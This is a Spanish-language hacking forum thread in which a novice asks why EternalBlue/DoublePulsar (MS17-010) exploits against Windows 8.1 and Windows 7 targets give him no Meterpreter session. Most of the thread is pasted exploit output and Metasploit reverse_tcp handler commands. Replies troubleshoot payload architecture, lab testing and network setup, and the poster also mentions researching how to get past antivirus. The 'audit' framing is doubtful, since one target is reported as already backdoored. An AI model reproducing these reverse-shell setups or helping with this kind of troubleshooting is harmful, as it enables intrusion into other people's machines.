auditando en windows pero no me llega la session meterpreter

Iniciado por r0071n73ct0r, 23 Agosto 2018, 09:22 AM

0 Miembros y 1 Visitante están viendo este tema.

r0071n73ct0r

hola queria saber por que no me llega la conexion meterpreter estoy auditando un sistema windows crea el file txt osea es vulnerable pero no me llega la session meterpreter algunos saven por que es?

Target OS: Windows 8.1
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017afe0098
InParam: 0xffffc00179f1216c
MID: 0x1403
unexpected alignment, diff: 0x10cd098
leak failed... try again
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017df92098
InParam: 0xffffc0017afe616c
MID: 0x1503
unexpected alignment, diff: 0x2fab098
leak failed... try again
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017df9e098
InParam: 0xffffc0017df9816c
MID: 0x1503
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target <----------------VES QUE SE CREA OSEA ES VULNERABLE!!
Done

hay se creo el payload pero no me llega  la conexion al meterpreter sigue igual

Target OS: Windows 8.1
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017e2e6098
InParam: 0xffffc0017e19b16c
MID: 0x2c03
unexpected alignment, diff: 0x14a098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017e376098
InParam: 0xffffc0017e2f616c
MID: 0x2d03
unexpected alignment, diff: 0x7f098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017ee5f098
InParam: 0xffffc0017e37c16c
MID: 0x2d03
unexpected alignment, diff: 0xae2098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017eef4098
InParam: 0xffffc0017eeee16c
MID: 0x2d03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on IPVICTIMA..... <------hay ME APARECIO LA IP PERO NO CONECTA
Creating service zRZy.....
Starting service zRZy.....
The NETBIOS connection with the remote host timed out.
Removing service zRZy.....
ServiceExec Error on: IPVICTIMA
nca_s_proto_error
Done


y esta es mi conexion en metasploit:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST MI IP LOCAL
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on MI IP LOCAL:4444


    alguna ayuda porfavor!!




aangrymasther

Puede que sea porque estas contra un equipo x64 y no estas usando el payload x64, prueba esto:
set payload windows/x64/meterpreter/reverse_tcp
Probablemente el 99% de lo que digo sea incorrecto

r0071n73ct0r

#2
hola ya probe y nada encima tengo otro para auditar pero tampoco me llega la conexion meterpreter


+] IP:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 <---ES VULNERABLE
[!] IP:445     - Host is likely INFECTED  - Arch: x86 (32-bit), XOR Key: <--- EL BACKDOOR FUE FILTRADO  Y ES WINDOWS 32 BITS use payload windows/meterpreter/reverse_tcp
0x5E367352

> exploit

  • Started reverse TCP handler on IPLOCAL:4444
  • IP:445 - Generating Eternalblue XML data
  • IP:445 - Generating Doublepulsar XML data
  • IP:445 - Generating payload DLL for Doublepulsar
  • IP:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
  • IP:445 - Launching Eternalblue...
    000f:err:service:process_send_command receiving command result timed out <-----SERA ESO EL PROBLEMA?
  • IP:445 - Backdoor is already installed
  • IP:445 - Launching Doublepulsar...
    000f:err:service:process_send_command receiving command result timed out<---- SERA ESO EL PROBLEMA?
  • IP:445 - Remote code executed... 3... 2... 1...
  • Exploit completed, but no session was created. <-----PERO NO ME LLEGA LA CONEXION METERPRETER

    sera esto el problema 000f:err:service:process_send_command receiving command result timed out
    poreso no me llega la conexion ya intente de mucha forma y nada hace 1 mes ando investigando y nose por que es

MCKSys Argentina

Revisaste el codigo del exploit, para ver porqué sale el mensaje ese que piensas que es el problema?

Si fuera tú, empezaría por ahí...

Saludos!
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


r0071n73ct0r

hola gracias por responderme si ya me fije el codigo del exploit lo modifique esta parte

OptInt.new('TimeOut',[false,'Timeout for blocking network calls (in seconds)',30]), <-- tenia 60 lo baje a 30 de tiempo pero ahora me aparece este error nose si sera el exploit o viene el problema de wine

exploit

  • Started reverse TCP handler on :4444
  • :445 - Generating Eternalblue XML data
  • :445 - Generating Doublepulsar XML data
  • :445 - Generating payload DLL for Doublepulsar
  • :445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
  • 445 - Launching Eternalblue...
    000f:err:service:process_send_command receiving command result timed out
    0014:err:service:process_send_command receiving command result timed out
    002b:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
    0014:err:service:process_send_command receiving command result timed out
    002b:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
  • :445 - Backdoor is already installed
  • :445 - Launching Doublepulsar...
    000f:err:service:process_send_command receiving command result timed out
  • :445 - Remote code executed... 3... 2... 1...
  • Exploit completed, but no session was created.


    ves ya nose que hacer no entiendo sera mi conexion estoy conectado por un router wifi no tengo mucha señal que digamos o sera problema de wine

.:UND3R:.

Lo primero que tienes que hacer para auditar de forma seria es tener todo TU ambiente preparado y reducir el límite de posibilidades inciertas al host a atacar, es decir debes saber si puedes recibir una conexión por el puerto 4444, si puedes explotar el exploit en un equipo de pruebas, etc. Luego de ello es el momento de auditar un equipo ajeno.

1) Crea un meterpreter ejecutable y con use multi/handler recibe la conexión. Si te funciona considerando que el meterpreter debe apuntar a una IP pública ya sabes que el problema ya no es de parte tuya.

2) Verifica el exploit de forma local, si logras que funcione ya sabes que el problema ya no es de parte tuya.

Ahora el target lo primero que debes hacer es un Information Gathering, no puedes probar un ataque así como si nada.

¿Qué SO es?
¿Qué arquitectura posee?
¿Que puertos tiene abierto?
¿Es posible que puedas usar otro exploit para ese target?

Ahora tus weapons,
¿Será que estás usando el exploit con mayor tasa de éxito? FuzzBunch o desde Metasploit propiamente tal?

Hipotéticamente asumiendo que hiciste todas las pruebas controladas en un laboratorio, verificaste cual era la respuesta del exploit si la máquina a atacar tenía AV? (En tu VM, instalas un AV que detecte el payload del exploit o el shellcode que será ejecutado).

Como vez cuando haces las cosas con paciencia y detalle quizás sea más evidente detectar el problema.

"OptInt.new('TimeOut',[false,'Timeout for blocking network calls (in seconds)',30])"

Ahí no lograrás mucho, el entero ahí solo especifica el tiempo límite para mostrar el mensaje de error.

En fin creo que hay mucho que probar
Saludos

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

r0071n73ct0r

#6
hola UNDER gracias por responderme y por decirme paso por paso las pauta que tuve que ir haciendo soy novato en esto y me falta por aprender ya me dedique alos pasos que me dijiste poreso tarde en responderte y aca estoy devuelta ya probe paso por paso como me ivas indicando....
creando un payload en un windows 7 y dio conecion pero tuve que desactivar el AV y no el FIREWALL
el exploit lo probe y el problema es que lo alertaba el AV asi que ahora tengo que investigar para bypass el AV y otro problema el exploit lo probe desactivando el AV y el FIREWALL y no conecta sigue apareciendo el error con wine como publike un post problema con wine pero bueno igual voy a intentar para la proxima cuando tenga un target vulnerable ir investigando por otras puertas no quedarme tildado en ese puerto nomas ...
igual tuve que cerrar el puerto  por hay alguien mas astuto que yo bypass mi AV y se filtra en mi sistema





die595tack067

hola, puede ser que desactives antivirus y firewall...pero tambien revisa que si lo estas haciendo con tu maquina fisica y una virtual verifica que la conexion este en NAT osea la configuracion de tu virtual..